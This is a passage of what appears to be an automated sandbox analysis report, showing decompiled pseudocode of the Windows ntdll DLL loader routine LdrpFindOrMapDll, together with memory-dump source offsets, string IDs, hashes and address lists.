                                                        					_push( *((intOrPtr*)(_t255 + 0x10)));
                                                        					_push( *(_t255 + 0xc));
                                                        					_push(_t248);
                                                        					E00BEE765();
                                                        					L72:
                                                        					return E00B4DFA1(_t123);
                                                        				}
                                                        			}





























                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 0-3744532478
                                                        • Opcode ID: da08617383c908222452c7ca18d6a226a7fcdaed22f227f29d5b5bcbb64f8c43
                                                        • Instruction ID: bbedffa9c821709de44414988a056c662da075e901c6d1adde5dd1f3a25a381b
                                                        • Opcode Fuzzy Hash: da08617383c908222452c7ca18d6a226a7fcdaed22f227f29d5b5bcbb64f8c43
                                                        • Instruction Fuzzy Hash: E3C1A171510249EFDB21EF68C885FB9B7E0EF08710F0488D8F99597692C724ED49EB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 86%
                                                        			E00B5E6C1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                        				signed int _t254;
                                                        				signed int _t257;
                                                        				signed int _t258;
                                                        				signed int _t260;
                                                        				signed int _t261;
                                                        				signed int _t263;
                                                        				signed int _t288;
                                                        				signed int _t290;
                                                        				signed int _t299;
                                                        				intOrPtr _t300;
                                                        				intOrPtr _t303;
                                                        				intOrPtr _t304;
                                                        				intOrPtr* _t319;
                                                        				intOrPtr* _t320;
                                                        				intOrPtr* _t321;
                                                        				intOrPtr _t324;
                                                        				signed int _t328;
                                                        				intOrPtr _t331;
                                                        				intOrPtr* _t332;
                                                        				signed short _t333;
                                                        				signed int _t336;
                                                        				intOrPtr _t347;
                                                        				signed int _t348;
                                                        				intOrPtr _t355;
                                                        				signed int _t376;
                                                        				signed int _t378;
                                                        				signed int _t380;
                                                        				signed short* _t388;
                                                        				signed short* _t390;
                                                        				signed int _t391;
                                                        				signed int _t401;
                                                        				intOrPtr _t403;
                                                        				intOrPtr* _t405;
                                                        				signed int _t406;
                                                        				intOrPtr _t407;
                                                        				signed int _t410;
                                                        				signed int _t411;
                                                        				intOrPtr* _t414;
                                                        				intOrPtr* _t416;
                                                        				signed int _t417;
                                                        				intOrPtr* _t418;
                                                        				void* _t419;
                                                        				void* _t421;
                                                        				void* _t422;
                                                        
                                                        				_push(0xb4);
                                                        				_push(0xb4be58);
                                                        				E00B4DF5C(__ebx, __edi, __esi);
                                                        				_t254 =  *0xb4f78c; // 0x8
                                                        				_t416 =  *((intOrPtr*)(_t421 + 0xc));
                                                        				if(( *0xc277a0 & (_t254 | 0x00000001)) != 0) {
                                                        					_push(_t416);
                                                        					E00BBF970(__ebx, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0xe7, "LdrpFindOrMapDll", 3, "DLL name: %wZ DLL path: %wZ\n",  *(_t421 + 8));
                                                        					_t422 = _t422 + 0x1c;
                                                        				}
                                                        				_t257 =  *0xc277a0; // 0x0
                                                        				if(( *0xb4f790 & _t257) != 0) {
                                                        					asm("int3");
                                                        				}
                                                        				_t410 = 0;
                                                        				 *(_t421 - 0x24) = 0;
                                                        				 *((intOrPtr*)(_t421 - 0x5c)) = 0;
                                                        				 *((intOrPtr*)(_t421 - 0x4c)) = 0;
                                                        				 *(_t421 - 0x28) = 0;
                                                        				 *(_t421 + 0xf) = 0;
                                                        				_t401 = 0;
                                                        				if( *(_t421 + 0x18) != 0) {
                                                        					_t258 = E00B4FA50(0,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
                                                        					__eflags = _t258;
                                                        					if(_t258 != 0) {
                                                        						goto L13;
                                                        					}
                                                        					_t411 = E00B61A18(_t406,  *(_t421 + 8), _t421 - 0x3c);
                                                        					__eflags = _t411;
                                                        					if(_t411 < 0) {
                                                        						goto L14;
                                                        					}
                                                        					_t411 = E00B61AC6(_t402,  *(_t421 + 8), _t421 - 0x48, _t421 - 0x34);
                                                        					__eflags = _t411;
                                                        					if(_t411 < 0) {
                                                        						E00B4E1C6(_t421 - 0x3c);
                                                        						goto L14;
                                                        					}
                                                        					 *(_t421 - 0x24) = 0x10000000;
                                                        					goto L84;
                                                        				} else {
                                                        					_t388 =  *(_t421 + 8);
                                                        					_t402 = _t388[2];
                                                        					_t390 = ( *_t388 & 0x0000ffff) + _t402 - 2;
                                                        					while(_t390 >= _t402) {
                                                        						_t406 =  *_t390 & 0x0000ffff;
                                                        						if(_t406 == 0x5c || _t406 == 0x2f) {
                                                        							 *(_t421 + 0xf) = 1;
                                                        							break;
                                                        						} else {
                                                        							_t390 = _t390;
                                                        							continue;
                                                        						}
                                                        					}
                                                        					__eflags =  *(_t421 + 0xf);
                                                        					if( *(_t421 + 0xf) == 0) {
                                                        						_t391 = E00B4FA50( *(_t421 + 8), _t410,  *((intOrPtr*)(_t421 + 0x1c)));
                                                        						__eflags = _t391;
                                                        						if(_t391 != 0) {
                                                        							L13:
                                                        							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
                                                        							_t411 = 0;
                                                        							__eflags = 0;
                                                        							L14:
                                                        							_t260 =  *0xb4f798; // 0x8
                                                        							_t261 = _t260 | 0x00000001;
                                                        							__eflags =  *0xc277a0 & _t261;
                                                        							if(( *0xc277a0 & _t261) != 0) {
                                                        								E00BBF970(_t401, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0x2d9, "LdrpFindOrMapDll", 4, "Status: 0x%08lx\n", _t411);
                                                        							}
                                                        							_t263 =  *0xc277a0; // 0x0
                                                        							__eflags =  *0xb4f79c & _t263;
                                                        							if(( *0xb4f79c & _t263) != 0) {
                                                        								asm("int3");
                                                        							}
                                                        							return E00B4DFA1(_t411);
                                                        						}
                                                        						_t411 = E00B5FBDF(_t410,  *(_t421 + 8), 0xf, _t421 - 0x48, _t421 - 0x34, _t421 - 0x2c);
                                                        						__eflags = _t411;
                                                        						if(_t411 < 0) {
                                                        							__eflags = _t411 - 0xc0000135;
                                                        							if(_t411 == 0xc0000135) {
                                                        								_t410 = 0;
                                                        								goto L10;
                                                        							}
                                                        							goto L14;
                                                        						}
                                                        						L19:
                                                        						_t290 = E00B4E893(_t421 - 0x48, 0xb5ed64, 1);
                                                        						__eflags = _t290;
                                                        						 *((char*)(_t421 + 0x10)) = _t290 & 0xffffff00 | _t290 != 0x00000000;
                                                        						_t411 = E00B5BC87(_t406, _t416,  *((intOrPtr*)(_t421 - 0x2c)),  *((intOrPtr*)(_t421 - 0x44)),  *((intOrPtr*)(_t421 - 0x30)),  *((intOrPtr*)(_t421 + 0x10)), _t421 - 0x1c, _t421 - 0x54);
                                                        						_t401 = 0;
                                                        						__eflags = _t411;
                                                        						if(__eflags < 0) {
                                                        							L29:
                                                        							E00B3F9F0( *((intOrPtr*)(_t421 - 0x2c)));
                                                        							__eflags =  *(_t421 - 0x28) - _t401;
                                                        							if( *(_t421 - 0x28) == _t401) {
                                                        								L32:
                                                        								E00B4E025(_t402,  *0xc20104, 0,  *((intOrPtr*)(_t421 - 0x30)));
                                                        								goto L14;
                                                        							}
                                                        							L30:
                                                        							E00B3F9F0( *(_t421 - 0x28));
                                                        							L31:
                                                        							E00B4E1C6(_t421 - 0x3c);
                                                        							goto L32;
                                                        						}
                                                        						 *(_t421 + 0x18) = _t411;
                                                        						_push(_t421 - 0x20);
                                                        						_push(0);
                                                        						_push( *((intOrPtr*)(_t421 - 0x54)));
                                                        						_push( *((intOrPtr*)(_t421 - 0x1c)));
                                                        						_push(0);
                                                        						_t411 = E00B4F535(_t411, _t416, __eflags);
                                                        						__eflags = _t411;
                                                        						if(_t411 < 0) {
                                                        							L28:
                                                        							_push( *((intOrPtr*)(_t421 - 0x1c)));
                                                        							E00B3FC90(0xffffffff);
                                                        							goto L29;
                                                        						}
                                                        						__eflags =  *(_t421 + 0xf);
                                                        						if( *(_t421 + 0xf) != 0) {
                                                        							_t299 = E00B61603( *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 + 0x1c)));
                                                        							__eflags = _t299;
                                                        							if(_t299 == 0) {
                                                        								goto L22;
                                                        							}
                                                        							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
                                                        							_t411 = 0;
                                                        							goto L28;
                                                        						}
                                                        						L22:
                                                        						__eflags =  *0xc200d8 - 0x2000;
                                                        						if( *0xc200d8 == 0x2000) {
                                                        							_t402 = 0x10b;
                                                        							_t300 =  *((intOrPtr*)(_t421 - 0x20));
                                                        							__eflags =  *((intOrPtr*)(_t300 + 0x18)) - 0x10b;
                                                        							if( *((intOrPtr*)(_t300 + 0x18)) != 0x10b) {
                                                        								goto L23;
                                                        							}
                                                        							__eflags =  *((intOrPtr*)(_t300 + 0x38)) - 0x1000;
                                                        							if( *((intOrPtr*)(_t300 + 0x38)) != 0x1000) {
                                                        								goto L23;
                                                        							}
                                                        							_push(_t401);
                                                        							_push(0x30);
                                                        							_push(_t421 - 0xc4);
                                                        							_push(1);
                                                        							E00B40060( *((intOrPtr*)(_t421 - 0x2c)));
                                                        							__eflags =  *(_t421 - 0xa1) & 0x00000008;
                                                        							if(__eflags == 0) {
                                                        								goto L23;
                                                        							}
                                                        							 *(_t421 - 4) = _t401;
                                                        							_t411 = E00BC5F1D(0x10b, _t406, __eflags, _t421 - 0x34,  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 - 0x1c)));
                                                        							 *(_t421 - 0x70) = _t411;
                                                        							 *(_t421 - 4) = 0xfffffffe;
                                                        							__eflags = _t411 - _t401;
                                                        							if(_t411 >= _t401) {
                                                        								goto L23;
                                                        							} else {
                                                        								goto L28;
                                                        							}
                                                        						}
                                                        						L23:
                                                        						_t417 = E00B4F5E6( *((intOrPtr*)(_t421 - 0x1c)), 1, 0xe, _t421 - 0x8c);
                                                        						 *(_t421 - 0x58) = _t417;
                                                        						__eflags = _t417 - _t401;
                                                        						if(_t417 != _t401) {
                                                        							__eflags =  *(_t417 + 0x10) & 0x00000001;
                                                        							if(( *(_t417 + 0x10) & 0x00000001) == 0) {
                                                        								goto L24;
                                                        							}
                                                        							_t380 = E00B7855C(_t401, _t411, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
                                                        							_t411 = _t380;
                                                        							__eflags = _t411 - _t401;
                                                        							if(_t411 < _t401) {
                                                        								goto L28;
                                                        							} else {
                                                        								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x01400000;
                                                        								 *(_t421 + 0x18) = _t380;
                                                        								goto L24;
                                                        							}
                                                        							L73:
                                                        							_t336 =  *(_t421 - 0x58);
                                                        							__eflags =  *(_t336 + 0x10) & 0x00000001;
                                                        							if(( *(_t336 + 0x10) & 0x00000001) != 0) {
                                                        								L45:
                                                        								_t411 = 0;
                                                        								E00B5EF95(_t418, 1, 0);
                                                        								E00B3F9F0( *((intOrPtr*)(_t421 - 0x2c)));
                                                        								__eflags =  *(_t421 - 0x28);
                                                        								if( *(_t421 - 0x28) != 0) {
                                                        									E00B3F9F0( *(_t421 - 0x28));
                                                        									E00B4E1C6(_t421 - 0x3c);
                                                        								}
                                                        								 *((intOrPtr*)( *((intOrPtr*)(_t421 + 0x1c)))) = _t418;
                                                        								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 1;
                                                        								goto L14;
                                                        							}
                                                        							_t411 = E00B7855C(_t401, _t414, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
                                                        							__eflags = _t411;
                                                        							if(_t411 < 0) {
                                                        								E00B4E025(_t402,  *0xc20104, 0, _t418);
                                                        								_t401 = 0;
                                                        								__eflags = 0;
                                                        								L121:
                                                        								__eflags =  *(_t421 - 0x24) & 0x00400000;
                                                        								if(__eflags != 0) {
                                                        									E00BC0010(_t401, _t411, _t418, __eflags,  *((intOrPtr*)(_t421 - 0x1c)));
                                                        								}
                                                        								goto L28;
                                                        							}
                                                        							 *(_t418 + 0x34) =  *(_t418 + 0x34) | 0x00000004;
                                                        							goto L45;
                                                        						}
                                                        						L24:
                                                        						__eflags =  *(_t421 + 0x18) - 0x4000000e;
                                                        						if(__eflags != 0) {
                                                        							__eflags =  *(_t421 + 0x14) & 0x00800000;
                                                        							if(( *(_t421 + 0x14) & 0x00800000) == 0) {
                                                        								L117:
                                                        								_t303 =  *((intOrPtr*)(_t421 - 0x20));
                                                        								L33:
                                                        								_t402 = 0x2000;
                                                        								__eflags =  *(_t303 + 0x16) & 0x00002000;
                                                        								if(( *(_t303 + 0x16) & 0x00002000) == 0) {
                                                        									L35:
                                                        									_t304 =  *0xc20058; // 0x0
                                                        									_t418 = E00B4E0C6( *0xc20104, _t304 + 0x40000, 0x78);
                                                        									__eflags = _t418 - _t401;
                                                        									if(_t418 == _t401) {
                                                        										_t411 = 0xc0000017;
                                                        										goto L121;
                                                        									} else {
                                                        										 *((intOrPtr*)(_t418 + 0x18)) =  *((intOrPtr*)(_t421 - 0x1c));
                                                        										__eflags =  *(_t421 - 0x24) & 0x00000004;
                                                        										if(( *(_t421 - 0x24) & 0x00000004) == 0) {
                                                        											 *(_t418 + 0x1c) = _t401;
                                                        										} else {
                                                        											_t347 =  *((intOrPtr*)(_t421 - 0x20));
                                                        											__eflags =  *((intOrPtr*)(_t347 + 0x28)) - _t401;
                                                        											if( *((intOrPtr*)(_t347 + 0x28)) == _t401) {
                                                        												_t348 = 0;
                                                        											} else {
                                                        												_t348 =  *((intOrPtr*)(_t347 + 0x28)) +  *((intOrPtr*)(_t421 - 0x1c));
                                                        												__eflags = _t348;
                                                        											}
                                                        											 *(_t418 + 0x1c) = _t348;
                                                        										}
                                                        										 *((intOrPtr*)(_t418 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 0x50));
                                                        										 *((intOrPtr*)(_t418 + 0x24)) =  *(_t421 - 0x34);
                                                        										 *((intOrPtr*)(_t418 + 0x28)) =  *((intOrPtr*)(_t421 - 0x30));
                                                        										_t91 = _t418 + 0x2c; // 0x2c
                                                        										_t401 = _t91;
                                                        										 *_t401 =  *((intOrPtr*)(_t421 - 0x48));
                                                        										 *((intOrPtr*)(_t401 + 4)) =  *((intOrPtr*)(_t421 - 0x44));
                                                        										 *(_t418 + 0x34) =  *(_t421 - 0x24);
                                                        										 *((short*)(_t418 + 0x38)) = 0;
                                                        										 *((short*)(_t418 + 0x3a)) = 0;
                                                        										 *((intOrPtr*)(_t418 + 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 8));
                                                        										__eflags = 0;
                                                        										 *((intOrPtr*)(_t418 + 0x48)) = 0;
                                                        										 *((intOrPtr*)(_t418 + 0x4c)) = 0;
                                                        										_t104 = _t418 + 0x50; // 0x50
                                                        										_t319 = _t104;
                                                        										 *((intOrPtr*)(_t319 + 4)) = _t319;
                                                        										 *_t319 = _t319;
                                                        										_t106 = _t418 + 0x58; // 0x58
                                                        										_t320 = _t106;
                                                        										 *((intOrPtr*)(_t320 + 4)) = _t320;
                                                        										 *_t320 = _t320;
                                                        										_t108 = _t418 + 0x60; // 0x60
                                                        										_t321 = _t108;
                                                        										 *((intOrPtr*)(_t321 + 4)) = _t321;
                                                        										 *_t321 = _t321;
                                                        										 *((intOrPtr*)(_t418 + 0x68)) = 0;
                                                        										 *(_t418 + 0x6c) =  *( *((intOrPtr*)(_t421 - 0x20)) + 0x34);
                                                        										_t324 =  *0x7ffe0018;
                                                        										_t403 =  *0x7ffe0014;
                                                        										_t407 =  *0x7ffe001c;
                                                        										while(1) {
                                                        											__eflags = _t324 - _t407;
                                                        											if(_t324 == _t407) {
                                                        												break;
                                                        											}
                                                        											asm("pause");
                                                        											_t324 =  *0x7ffe0018;
                                                        											_t403 =  *0x7ffe0014;
                                                        											_t407 =  *0x7ffe001c;
                                                        										}
                                                        										 *((intOrPtr*)(_t418 + 0x70)) = _t403;
                                                        										 *((intOrPtr*)(_t418 + 0x74)) = _t324;
                                                        										_push(0);
                                                        										_push(4);
                                                        										_push(_t421 - 0x6c);
                                                        										_push(2);
                                                        										E00B40060( *((intOrPtr*)(_t421 - 0x2c)));
                                                        										_t328 =  *(_t421 - 0x6c);
                                                        										__eflags = _t328;
                                                        										if(_t328 != 0) {
                                                        											_t119 = _t418 + 0x6c;
                                                        											 *_t119 =  *(_t418 + 0x6c) - _t328;
                                                        											__eflags =  *_t119;
                                                        										}
                                                        										_t121 = _t418 + 0x3c; // 0x3c
                                                        										_t414 = _t121;
                                                        										_t331 = 0xc24820 + (E00B4FAC1(_t401) & 0x0000001f) * 8;
                                                        										_t405 =  *((intOrPtr*)(_t331 + 4));
                                                        										 *_t414 = _t331;
                                                        										 *((intOrPtr*)(_t414 + 4)) = _t405;
                                                        										 *_t405 = _t414;
                                                        										 *((intOrPtr*)(_t331 + 4)) = _t414;
                                                        										_t332 =  *0xc20210; // 0x562a08
                                                        										 *_t418 = 0xc2020c;
                                                        										 *((intOrPtr*)(_t418 + 4)) = _t332;
                                                        										 *_t332 = _t418;
                                                        										 *0xc20210 = _t418;
                                                        										_t128 = _t418 + 8; // 0x8
                                                        										_t333 = _t128;
                                                        										_t402 =  *0xc20218; // 0x562a10
                                                        										 *_t333 = 0xc20214;
                                                        										 *(_t333 + 4) = _t402;
                                                        										 *_t402 = _t333;
                                                        										 *0xc20218 = _t333;
                                                        										E00B604F2(_t401, _t402, _t407, _t414, 0xc22200,  *((intOrPtr*)(_t418 + 0x18)),  *((intOrPtr*)(_t418 + 0x20)));
                                                        										E00B602AC(_t402, _t418);
                                                        										__eflags =  *(_t421 - 0x58);
                                                        										if( *(_t421 - 0x58) != 0) {
                                                        											goto L73;
                                                        										} else {
                                                        											goto L45;
                                                        										}
                                                        									}
                                                        								}
                                                        								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x00000004;
                                                        								__eflags =  *(_t421 + 0x18) - 0x40000003;
                                                        								if( *(_t421 + 0x18) == 0x40000003) {
                                                        									_t402 = _t421 - 0x34;
                                                        									_t411 = E00B9A0F8(_t421 - 0x34, _t406,  *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x54)), _t303, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x10)));
                                                        									__eflags = _t411 - _t401;
                                                        									if(_t411 >= _t401) {
                                                        										goto L35;
                                                        									}
                                                        									goto L28;
                                                        								}
                                                        								goto L35;
                                                        							}
                                                        							__eflags =  *(_t421 + 0x14) & 0x00000002;
                                                        							if(( *(_t421 + 0x14) & 0x00000002) != 0) {
                                                        								goto L117;
                                                        							}
                                                        							_t402 = 0x2000;
                                                        							_t303 =  *((intOrPtr*)(_t421 - 0x20));
                                                        							__eflags =  *(_t303 + 0x16) & 0x00002000;
                                                        							if(( *(_t303 + 0x16) & 0x00002000) != 0) {
                                                        								L115:
                                                        								__eflags =  *(_t303 + 0x5e) & 0x00000080;
                                                        								if(( *(_t303 + 0x5e) & 0x00000080) != 0) {
                                                        									goto L33;
                                                        								}
                                                        								_t411 = 0xc0000428;
                                                        								goto L28;
                                                        							}
                                                        							__eflags = _t417 - _t401;
                                                        							if(_t417 == _t401) {
                                                        								goto L33;
                                                        							}
                                                        							__eflags =  *(_t417 + 0x10) & 0x00000001;
                                                        							if(( *(_t417 + 0x10) & 0x00000001) != 0) {
                                                        								goto L33;
                                                        							}
                                                        							goto L115;
                                                        						}
                                                        						_push(_t421 - 0x68);
                                                        						_push(_t401);
                                                        						_push(_t401);
                                                        						_push( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 8)));
                                                        						_push(3);
                                                        						E00B4F535(0x4000000e, _t417, __eflags);
                                                        						_t355 =  *((intOrPtr*)(_t421 - 0x68));
                                                        						__eflags =  *((short*)(_t355 + 0x48)) - 3;
                                                        						if( *((short*)(_t355 + 0x48)) <= 3) {
                                                        							 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
                                                        							_push(_t421 - 0x50);
                                                        							_push(2);
                                                        							_push(_t421 - 0x40);
                                                        							_push(1);
                                                        							_push(1);
                                                        							_t411 = E00B41614(0x4000000e);
                                                        							__eflags = _t411 - _t401;
                                                        							if(_t411 < _t401) {
                                                        								goto L28;
                                                        							}
                                                        							__eflags =  *((intOrPtr*)(_t421 - 0x50)) - 3;
                                                        							if( *((intOrPtr*)(_t421 - 0x50)) != 3) {
                                                        								goto L35;
                                                        							}
                                                        							__eflags =  *0xc20001;
                                                        							if( *0xc20001 != 0) {
                                                        								 *0xc29240 =  *0xc29240 + 1;
                                                        							}
                                                        							L27:
                                                        							_t411 = 0xc000007b;
                                                        							goto L28;
                                                        						}
                                                        						__eflags =  *((intOrPtr*)(_t421 - 0x5c)) - _t401;
                                                        						if( *((intOrPtr*)(_t421 - 0x5c)) != _t401) {
                                                        							_push( *((intOrPtr*)(_t421 - 0x1c)));
                                                        							E00B3FC90(0xffffffff);
                                                        							E00B3F9F0( *((intOrPtr*)(_t421 - 0x2c)));
                                                        							E00B3F9F0( *(_t421 - 0x28));
                                                        							E00B4E1C6(_t421 - 0x3c);
                                                        							_t410 = 0;
                                                        							E00B4E025(_t402,  *0xc20104, 0,  *((intOrPtr*)(_t421 - 0x30)));
                                                        							_t401 = 1;
                                                        							L11:
                                                        							_t419 = E00B4E825( *(_t421 + 8));
                                                        							__eflags = _t419 - 2;
                                                        							if(_t419 != 2) {
                                                        								L54:
                                                        								_t411 = E00B61C26(_t402, _t406,  *(_t421 + 8), _t419, _t421 - 0x60,  *((intOrPtr*)(_t421 - 0x4c)), _t421 - 0x48, _t421 - 0x34, _t421 - 0x3c);
                                                        								__eflags = _t411;
                                                        								if(_t411 < 0) {
                                                        									__eflags = _t411 - 0xc0000135;
                                                        									if(_t411 == 0xc0000135) {
                                                        										__eflags = _t401;
                                                        										if(_t401 != 0) {
                                                        											_t411 = 0xc000007b;
                                                        										} else {
                                                        											E00B77CC4( *(_t421 + 8));
                                                        											E00B62D04(0xc0000135,  *(_t421 + 8), 0);
                                                        										}
                                                        									}
                                                        									goto L14;
                                                        								}
                                                        								__eflags =  *(_t421 + 0xf);
                                                        								if( *(_t421 + 0xf) == 0) {
                                                        									L84:
                                                        									 *((intOrPtr*)(_t421 - 0x88)) = 0x18;
                                                        									_t416 = 0;
                                                        									 *((intOrPtr*)(_t421 - 0x84)) = 0;
                                                        									0x840 = 0x40;
                                                        									__eflags =  *0xc2924c;
                                                        									if( *0xc2924c == 0) {
                                                        									}
                                                        									 *((intOrPtr*)(_t421 - 0x7c)) = 0x840;
                                                        									 *((intOrPtr*)(_t421 - 0x80)) = _t421 - 0x3c;
                                                        									 *((intOrPtr*)(_t421 - 0x78)) = _t416;
                                                        									 *((intOrPtr*)(_t421 - 0x74)) = _t416;
                                                        									_push(0x60);
                                                        									_push(5);
                                                        									_push(_t421 - 0x94);
                                                        									_push(_t421 - 0x88);
                                                        									_push(0x100021);
                                                        									_t411 = E00B3FD74(_t421 - 0x28);
                                                        									__eflags = _t411 - _t416;
                                                        									if(_t411 < _t416) {
                                                        										__eflags = _t411 - 0xc0000034;
                                                        										if(_t411 == 0xc0000034) {
                                                        											L88:
                                                        											_t411 = 0xc0000135;
                                                        											goto L31;
                                                        										}
                                                        										__eflags = _t411 - 0xc000003a;
                                                        										if(_t411 != 0xc000003a) {
                                                        											goto L31;
                                                        										}
                                                        										goto L88;
                                                        									} else {
                                                        										_push( *(_t421 - 0x28));
                                                        										_push(0x1000000);
                                                        										_push(0x10);
                                                        										_push(_t416);
                                                        										_push(_t416);
                                                        										_push(0xf);
                                                        										_t411 = E00B3FFB4(_t421 - 0x2c);
                                                        										__eflags = _t411 - _t416;
                                                        										if(_t411 < _t416) {
                                                        											__eflags = _t411 - 0xc0000017;
                                                        											if(_t411 != 0xc0000017) {
                                                        												__eflags = _t411 - 0xc000009a;
                                                        												if(_t411 != 0xc000009a) {
                                                        													__eflags = _t411 - 0xc000012d;
                                                        													if(_t411 != 0xc000012d) {
                                                        														 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
                                                        														_push(_t421 - 0x50);
                                                        														_push(1);
                                                        														_push(_t421 - 0x40);
                                                        														_push(1);
                                                        														_push(1);
                                                        														_t288 = E00B41614(0xc000007b);
                                                        														__eflags = _t288;
                                                        														if(_t288 >= 0) {
                                                        															__eflags =  *0xc20001;
                                                        															if( *0xc20001 != 0) {
                                                        																 *0xc29240 =  *0xc29240 + 1;
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        											goto L30;
                                                        										}
                                                        										__eflags =  *(_t421 + 0x14) & 0x00001000;
                                                        										if(( *(_t421 + 0x14) & 0x00001000) != 0) {
                                                        											goto L19;
                                                        										}
                                                        										_t411 = E00B61D44(_t402, _t421 - 0x3c,  *(_t421 - 0x28));
                                                        										__eflags = _t411;
                                                        										if(_t411 >= 0) {
                                                        											goto L19;
                                                        										}
                                                        										__eflags = _t411 - 0xc0000225;
                                                        										if(_t411 == 0xc0000225) {
                                                        											goto L19;
                                                        										} else {
                                                        											_t401 = 0;
                                                        											goto L29;
                                                        										}
                                                        										goto L54;
                                                        									}
                                                        								}
                                                        								__eflags = _t419 - 2;
                                                        								if(_t419 == 2) {
                                                        									goto L84;
                                                        								}
                                                        								_t376 = E00B4FA50(_t421 - 0x48, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x1c)));
                                                        								__eflags = _t376;
                                                        								if(_t376 == 0) {
                                                        									goto L84;
                                                        								}
                                                        								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
                                                        								_t411 = 0;
                                                        								goto L31;
                                                        							}
                                                        							_t378 = E00B4FA50(_t410,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
                                                        							__eflags = _t378;
                                                        							if(_t378 == 0) {
                                                        								goto L54;
                                                        							}
                                                        							goto L13;
                                                        						}
                                                        						goto L27;
                                                        					}
                                                        					L10:
                                                        					 *((intOrPtr*)(_t421 - 0x60)) =  *_t416;
                                                        					 *((intOrPtr*)(_t421 - 0x5c)) =  *((intOrPtr*)(_t416 + 4));
                                                        					 *((intOrPtr*)(_t421 - 0x4c)) =  *((intOrPtr*)(_t421 + 0x10));
                                                        					goto L11;
                                                        				}
                                                        			}

                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b60275
                                                        0x00b6013f
                                                        0x00b60112
                                                        0x00b60116
                                                        0x00b6011d
                                                        0x00b9a0bf
                                                        0x00b9a0cf
                                                        0x00b9a0d1
                                                        0x00b9a0d3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9a0d9
                                                        0x00000000
                                                        0x00b6011d
                                                        0x00b9fd88
                                                        0x00b9fd8c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fd8e
                                                        0x00b9fd93
                                                        0x00b9fd96
                                                        0x00b9fd9a
                                                        0x00b9fdae
                                                        0x00b9fdae
                                                        0x00b9fdb2
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fdb8
                                                        0x00000000
                                                        0x00b9fdb8
                                                        0x00b9fd9c
                                                        0x00b9fd9e
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fda4
                                                        0x00b9fda8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fda8
                                                        0x00b5ecf2
                                                        0x00b5ecf3
                                                        0x00b5ecf4
                                                        0x00b5ecfe
                                                        0x00b5ed01
                                                        0x00b5ed03
                                                        0x00b5ed08
                                                        0x00b5ed0b
                                                        0x00b5ed10
                                                        0x00b9fd3c
                                                        0x00b9fd42
                                                        0x00b9fd43
                                                        0x00b9fd48
                                                        0x00b9fd49
                                                        0x00b9fd4b
                                                        0x00b9fd53
                                                        0x00b9fd55
                                                        0x00b9fd57
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fd5d
                                                        0x00b9fd61
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fd67
                                                        0x00b9fd6e
                                                        0x00b9fd74
                                                        0x00b9fd74
                                                        0x00b5ed1f
                                                        0x00b5ed1f
                                                        0x00000000
                                                        0x00b5ed1f
                                                        0x00b5ed16
                                                        0x00b5ed19
                                                        0x00b9fcfe
                                                        0x00b9fd03
                                                        0x00b9fd0b
                                                        0x00b9fd13
                                                        0x00b9fd1c
                                                        0x00b9fd24
                                                        0x00b9fd2d
                                                        0x00b9fd32
                                                        0x00b5e758
                                                        0x00b5e760
                                                        0x00b5e762
                                                        0x00b5e765
                                                        0x00b61d5d
                                                        0x00b61d79
                                                        0x00b61d7b
                                                        0x00b61d7d
                                                        0x00b77c97
                                                        0x00b77c99
                                                        0x00b77c9f
                                                        0x00b77ca1
                                                        0x00b9fbcc
                                                        0x00b77ca7
                                                        0x00b77caa
                                                        0x00b77cb5
